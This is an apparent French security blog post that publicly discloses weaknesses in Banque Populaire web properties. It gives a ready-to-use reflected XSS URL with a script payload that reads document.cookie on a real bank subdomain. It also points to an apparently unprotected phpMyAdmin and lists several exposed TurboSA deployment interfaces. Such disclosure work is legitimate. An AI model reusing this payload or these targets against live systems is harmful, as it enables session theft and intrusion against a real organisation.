L'objectif est de faire prendre conscience de la nécessité d'une politique globale en faveur d'une sécurité transparente. Je ne saurais être tenu responsable de toutes mauvaises utilisations de ces informations dans le cas où l'entreprise n'a pas pris au sérieux mon alerte.



Hello : http://click.magneto.banquepopulaire.fr/

J'avais déjà fait un article sur la Banque Populaire : https://in-securite.fr/proof-of-concept/banque-populaire. Il était déjà assez conséquent mais je dois en faire un second suite à une amélioration de mes protocoles.

On commence doucement par une petite XSS : https://www.dominos.banquepopulaire.fr/WebBP/Jsp/pageBoutiqueFicheArticle.jsp?aec_id="><script>alert(document.cookie);</script>&fak_id="><script>alert('In-Securite.fr');</script>

Note : Ce site semble être celui d'un genre de comité d'entreprise.

Oh pauvre petit PHPMyAdmin non protégé par au moins un .htaccess : http://sante.banquepopulaire.fr/

Et ensuite, TurboSA est encore exposé donc je suppose ce coup-ci qu'il s'agit d'un programme pour tous ou tout du moins à destination de tous :

  • https://banque-de-savoie.deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://banque-marze.deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://bdp.deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://btp-banque.deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://credit-cooperatif.deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://creditmaritime.deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://deploiement.turbosa.banquepopulaire.fr/sev2/
  • https://natixis.deploiement.turbosa.banquepopulaire.fr/sev2/

Ensuite un peu d'informations sur la structure :

  • https://opendata.banquepopulaire.fr/webservice/infoBPsimple.php
  • http://facelia-form.banquepopulaire.fr/

Article Suivant Article Précédent